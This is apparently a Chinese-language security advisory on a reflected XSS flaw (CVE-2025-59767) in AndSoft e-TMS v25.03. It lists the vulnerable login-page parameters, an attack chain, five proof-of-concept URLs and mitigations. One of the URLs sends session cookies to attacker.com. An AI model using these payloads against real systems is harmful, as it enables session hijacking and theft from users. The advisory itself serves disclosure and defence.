CVE-2025-59767：AndSoft e-TMS反射型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-59767

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59767是存在于AndSoft公司开发的e-TMS（Electronic Transport Management System，电子运输管理系统）v25.03版本中的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并报告，CVSS 3.1评分为6.1分，属于中危级别。

e-TMS是一款广泛应用于物流和运输行业的管理系统，用于处理运输订单、车辆调度、物流跟踪等业务。该系统在企业供应链管理中扮演重要角色，因此其安全性直接关系到企业业务数据的完整性和用户账户的安全。

该漏洞位于e-TMS的登录框架页面 `/clt/LOGINFRM_LVE.ASP` 中，具体涉及多个URL参数，包括 `l`、`demo`、`demo2`、`TNTLOGIN`、`UO` 和 `SuppConn`。这些参数在接收用户输入后未经充分的过滤和转义处理，直接将其内容输出到HTML响应中，导致攻击者可以通过构造恶意URL，在受害者的浏览器中执行任意JavaScript代码。

由于该漏洞为反射型XSS，需要用户交互才能触发（点击恶意链接），攻击者通常会通过钓鱼邮件、即时通讯工具或社交工程等方式诱导受害者访问特制的恶意URL。一旦成功利用，攻击者可以窃取用户的会话Cookie、劫持用户会话、进行钓鱼攻击或在受害者权限范围内执行未授权操作，对企业和用户的数据安全构成威胁。

技术细节

该漏洞的技术原理在于e-TMS v25.03的登录框架页面 `/clt/LOGINFRM_LVE.ASP` 对用户输入的参数缺乏充分的输出编码和过滤机制。具体而言，`l`、`demo`、`demo2`、`TNTLOGIN`、`UO` 和 `SuppConn` 这六个参数在服务器端接收后，未经过HTML实体编码或严格的输入验证，直接被嵌入到返回的HTML页面中。

反射型XSS的利用过程如下：攻击者首先构造一个包含恶意JavaScript代码的特殊URL，该URL将恶意脚本作为参数值嵌入到上述受影响的参数中。当受害者通过浏览器访问该恶意URL时，服务器会将包含恶意脚本的页面内容返回给浏览器。由于浏览器无法区分合法HTML内容和注入的恶意脚本，因此会执行嵌入在页面中的JavaScript代码。

攻击者可以利用此漏洞执行多种恶意操作，包括但不限于：窃取用户的会话Cookie和身份验证令牌、劫持用户会话以冒充合法用户身份、修改页面内容进行钓鱼攻击、重定向用户到恶意网站、记录用户键盘输入以及在受害者权限范围内执行任意操作。由于该漏洞的CVSS向量为 `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`，表明该漏洞可通过网络远程利用，无需认证，但需要用户交互（如点击链接），且影响范围会扩散到其他组件，对机密性和完整性造成低级别影响。

攻击链分析

STEP 1

步骤1：信息收集与目标侦察

攻击者首先识别目标组织是否使用AndSoft e-TMS系统，通过网络空间搜索引擎或直接访问目标网站确认系统版本是否为v25.03。

STEP 2

步骤2：漏洞验证与参数探测

攻击者访问 `/clt/LOGINFRM_LVE.ASP` 页面，逐一测试 `l`、`demo`、`demo2`、`TNTLOGIN`、`UO` 和 `SuppConn` 参数，确认哪些参数存在XSS漏洞。

STEP 3

步骤3：构造恶意URL

攻击者将恶意JavaScript代码（如Cookie窃取、会话劫持或钓鱼重定向代码）嵌入到存在漏洞的参数中，构造完整的恶意URL。

STEP 4

步骤4：投递恶意链接

攻击者通过钓鱼邮件、即时通讯工具、社交媒体或其他社交工程手段，将恶意URL发送给目标用户，诱导其点击。

STEP 5

步骤5：触发漏洞与执行恶意脚本

受害者在浏览器中点击恶意URL后，服务器返回包含恶意脚本的页面，浏览器执行嵌入的JavaScript代码。

STEP 6

步骤6：数据窃取与权限滥用

恶意脚本执行后，攻击者窃取用户的会话Cookie、身份令牌或敏感信息，利用受害者权限进行未授权操作，如数据窃取、账户劫持或进一步渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Reflected XSS PoC for CVE-2025-59767 -->
<!-- Target: AndSoft e-TMS v25.03 -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_LVE.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- PoC 1: Using 'l' parameter -->
https://target-host/clt/LOGINFRM_LVE.ASP?l=<script>alert('XSS-CVE-2025-59767')</script>

<!-- PoC 2: Using 'demo' parameter -->
https://target-host/clt/LOGINFRM_LVE.ASP?demo=<script>alert(document.cookie)</script>

<!-- PoC 3: Using 'TNTLOGIN' parameter -->
https://target-host/clt/LOGINFRM_LVE.ASP?TNTLOGIN="><script>alert('XSS')</script>

<!-- PoC 4: Cookie stealing example (for demonstration purposes only) -->
https://target-host/clt/LOGINFRM_LVE.ASP?UO=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

<!-- PoC 5: Using multiple parameters -->
https://target-host/clt/LOGINFRM_LVE.ASP?l=<script>alert(1)</script>&demo=<script>alert(2)</script>&TNTLOGIN=<script>alert(3)</script>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面部署规则，对 `/clt/LOGINFRM_LVE.ASP` 页面中的 `l`、`demo`、`demo2`、`TNTLOGIN`、`UO` 和 `SuppConn` 参数进行输入过滤，阻止包含HTML标签和JavaScript代码的请求；2）配置Web应用防火墙（WAF）规则，检测和拦截常见的XSS攻击载荷；3）实施严格的内容安全策略（CSP），限制内联脚本的执行；4）告知用户警惕来历不明的链接，特别是涉及e-TMS登录页面的链接；5）监控异常的用户会话和登录活动，及时发现潜在的攻击行为。